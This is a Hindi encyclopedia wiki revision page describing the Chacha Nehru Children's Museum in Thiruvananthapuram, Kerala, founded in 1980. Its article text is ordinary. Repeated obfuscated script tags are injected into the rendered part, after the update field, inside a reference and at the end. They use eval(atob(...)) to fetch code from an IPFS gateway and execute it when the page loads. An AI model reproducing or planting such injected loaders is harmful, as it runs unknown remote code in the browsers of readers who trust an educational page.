Difference between revisions of "चाचा नेहरू बाल संग्रहालय तिरुअनंतपुरम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
[[केरल]] की राजधानी [[तिरुअनंतपुरम]] में कई [[तिरुअनंतपुरम पर्यटन|पर्यटन स्थल]] हैं जिनमें से एक चाचा नेहरू बाल संग्रहालय हैं।
+
{{सूचना बक्सा संग्रहालय
 +
|चित्र=Chacha-Nehru-Children-Museum.jpg
 +
|चित्र का नाम=चाचा नेहरू बाल संग्रहालय, तिरुअनंतपुरम
 +
|विवरण=चाचा नेहरू बाल संग्रहालय बच्चों के आकर्षण का केंद्र है।
 +
|राज्य=[[केरल]]  
 +
|नगर=[[तिरुअनंतपुरम]]
 +
|निर्माण=
 +
|स्थापना=सन [[1980]]
 +
|भौगोलिक स्थिति=
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|मानचित्र लिंक=
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=इस संग्रहालय में विभिन्न परिधानों में सजी 2000 आकृतियाँ रखी गई हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|17:20, 8 मई 2012 (IST)}}
 +
}}
 +
'''चाचा नेहरू बाल संग्रहालय''' [[केरल]] राज्य की राजधानी [[तिरुअनंतपुरम]] में स्थित है।
 
*चाचा नेहरू बाल संग्रहालय बच्चों के आकर्षण का केंद्र है।
 
*चाचा नेहरू बाल संग्रहालय बच्चों के आकर्षण का केंद्र है।
*इसकी स्थापना 1980 में की गई थी।  
+
*इस संग्रहालय की स्थापना सन [[1980]] में की गई थी।  
*यह सिटी सेंट्रल बस स्टेशन से 1 किलोमीटर उत्तर में स्थित है।  
+
*यह सिटी सेंट्रल बस स्टेशन से 1 किमी उत्तर में स्थित है।  
 
*इस संग्रहालय में विभिन्न परिधानों में सजी 2000 आकृतियाँ रखी गई हैं।  
 
*इस संग्रहालय में विभिन्न परिधानों में सजी 2000 आकृतियाँ रखी गई हैं।  
*यहाँ हेल्थ एजुकेशन डिस्प्ले, एक छोटा एक्वेरिअम और [[मलयालम भाषा|मलयालम]] में प्रकाशित पहली [[बाल साहित्य]] की प्रति भी प्रदर्शित की गई है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=383 |title=देवताओं की नगरी के नाम से मशहूर |accessmonthday=[[21 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=[[हिन्दी]] }}</ref>
+
*यहाँ हेल्थ एजुकेशन डिस्प्ले, एक छोटा एक्वेरिअम और [[मलयालम भाषा|मलयालम]] में प्रकाशित पहली बाल साहित्य की प्रति भी प्रदर्शित की गई है।<ref>{{cite web |url=http://yatrasalah.com/touristPlaces.aspx?id=383 |title=देवताओं की नगरी के नाम से मशहूर |accessmonthday=[[21 अक्टूबर]] |accessyear=[[2010]] |last= |first= |authorlink= |format= |publisher=यात्रा सलाह |language=[[हिन्दी]] }}</ref>
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Latest revision as of 11:50, 8 May 2012

chacha neharoo bal sangrahalay tiruanantapuram
vivaran chacha neharoo bal sangrahalay bachchoan ke akarshan ka keandr hai.
rajy keral
nagar tiruanantapuram
sthapana san 1980
any janakari is sangrahalay mean vibhinn paridhanoan mean saji 2000 akritiyaan rakhi gee haian.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

chacha neharoo bal sangrahalay keral rajy ki rajadhani tiruanantapuram mean sthit hai.

  • chacha neharoo bal sangrahalay bachchoan ke akarshan ka keandr hai.
  • is sangrahalay ki sthapana san 1980 mean ki gee thi.
  • yah siti seantral bas steshan se 1 kimi uttar mean sthit hai.
  • is sangrahalay mean vibhinn paridhanoan mean saji 2000 akritiyaan rakhi gee haian.
  • yahaan helth ejukeshan disple, ek chhota ekveriam aur malayalam mean prakashit pahali bal sahity ki prati bhi pradarshit ki gee hai.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. devataoan ki nagari ke nam se mashahoor (hindi) yatra salah. abhigaman tithi: 21 aktoobar, 2010.<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>